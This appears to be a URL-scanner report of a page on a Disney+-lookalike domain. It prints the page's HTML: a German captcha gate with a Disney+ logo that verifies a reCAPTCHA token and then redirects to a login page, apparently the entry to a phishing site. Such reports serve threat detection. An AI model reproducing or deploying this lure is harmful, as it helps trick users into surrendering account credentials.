- ID scansione:
- 1fa6ba73-e072-40d6-856a-679daaa6c30bFatto
- URL inviato:
- https://vodd-disnn.com/Reindirizzato
- Report terminato:
Link · 0 trovati
I link in uscita identificati dalla pagina
Variabili JavaScript · 12 trovate
Le variabili JavaScript globali caricate sull'oggetto finestra di una pagina sono variabili dichiarate all'esterno delle funzioni e accessibili da qualsiasi punto del codice nell'ambito corrente
Nome | Tipo |
---|---|
0 | object |
1 | object |
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
onSubmit | function |
___grecaptcha_cfg | object |
grecaptcha | object |
__recaptcha_api | string |
__google_recaptcha_client | boolean |
Messaggi di log della console · 1 trovati
Messaggi registrati nella console Web
Tipo | Categoria | Log |
---|---|---|
error | network |
|
HTML
Il corpo HTML non elaborato della pagina
<!DOCTYPE html><html lang="de"><head><meta http-equiv="origin-trial" content="A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Captcha</title>
<style>
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;700&display=swap');
html, body {
height: 100%;
margin: 0;
font-family: 'Roboto', sans-serif;
background-color: #1a1d29; /* Dunkler Hintergrund */
}
.container {
display: flex;
justify-content: center;
align-items: center;
height: 100%;
text-align: center;
}
.box {
padding: 30px;
background-color: #2a2d3a; /* Hintergrundfarbe der Box */
max-width: 500px;
width: 100%;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3); /* Schatten */
border-radius: 8px;
}
.logo {
max-width: 200px;
margin-bottom: 20px;
}
h1 {
margin-top: 0;
font-size: 28px;
color: #ffffff; /* Haupttextfarbe */
font-weight: 700;
}
p {
font-size: 16px;
color: #b0b0b0; /* Sekundäre Textfarbe */
font-weight: 400;
line-height: 1.5;
}
input[type="button"] {
background-color: #4285f4;
border: none;
color: white;
padding: 10px 20px;
font-size: 16px;
font-weight: 500;
letter-spacing: 1px;
border-radius: 4px;
cursor: pointer;
transition: background-color 0.3s, box-shadow 0.3s;
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
}
input[type="button"]:hover {
background-color: #387ae0;
box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
}
input[type="button"]:active {
background-color: #2b63ad;
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
}
</style>
<script type="text/javascript" async="" charset="utf-8" src="https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js" crossorigin="anonymous" integrity="sha384-gaZtYaI7oJHEOo1YO6VuoCE4iZ5fMV9mYHP0BHf+r2ttABnpWWCIkgI6ItNW4ZdO"></script><script src="https://www.google.com/recaptcha/api.js?render=6LefeXcqAAAAAM1EorBl6YJzGkM4m8FUUZVWdFSP" async="" defer=""></script>
<script>
function onSubmit() {
grecaptcha.ready(function () {
grecaptcha.execute('6LefeXcqAAAAAM1EorBl6YJzGkM4m8FUUZVWdFSP', { action: 'submit' }).then(function (token) {
var form = document.getElementById('captcha-form');
var input = document.createElement('input');
input.type = 'hidden';
input.name = 'g-recaptcha-response';
input.value = token;
form.appendChild(input);
fetch('recaptcha_reponse.php', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: new URLSearchParams(new FormData(form)).toString(),
})
.then(response => response.json())
.then(data => {
if (data.success) {
window.location.href = 'login.php';
} else {
console.log('Ungültiges Captcha. Bitte versuchen Sie es erneut.');
}
})
.catch(error => {
console.error('Fehler beim Senden der Anfrage:', error);
});
});
});
}
</script>
</head>
<body>
<div class="container">
<div class="box">
<img src="logo.png" alt="Disney+ Logo" class="logo"> <!-- Mise à jour du logo -->
<h1>Bist du ein Mensch?</h1>
<p>Um zu bestätigen, dass du ein Mensch und kein Roboter bist, klicke bitte auf den untenstehenden Knopf.</p>
<form method="post" id="captcha-form">
<input type="button" value="Ich bin ein Mensch" onclick="onSubmit()">
</form>
</div>
</div>
<div><div class="grecaptcha-badge" data-style="bottomright" style="width: 256px; height: 60px; display: block; transition: right 0.3s ease 0s; position: fixed; bottom: 14px; right: -186px; box-shadow: gray 0px 0px 5px; border-radius: 2px; overflow: hidden;"><div class="grecaptcha-logo"><iframe title="reCAPTCHA" width="256" height="60" role="presentation" name="a-geqakmgf2fs5" frameborder="0" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" src="https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LefeXcqAAAAAM1EorBl6YJzGkM4m8FUUZVWdFSP&co=aHR0cHM6Ly92b2RkLWRpc25uLmNvbTo0NDM.&hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&size=invisible&cb=nzrauff9x38v"></iframe></div><div class="grecaptcha-error"></div><textarea id="g-recaptcha-response-100000" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px; height: 40px; border: 1px solid rgb(193, 193, 193); margin: 10px 25px; padding: 0px; resize: none; display: none;"></textarea></div><iframe style="display: none;"></iframe></div></body></html>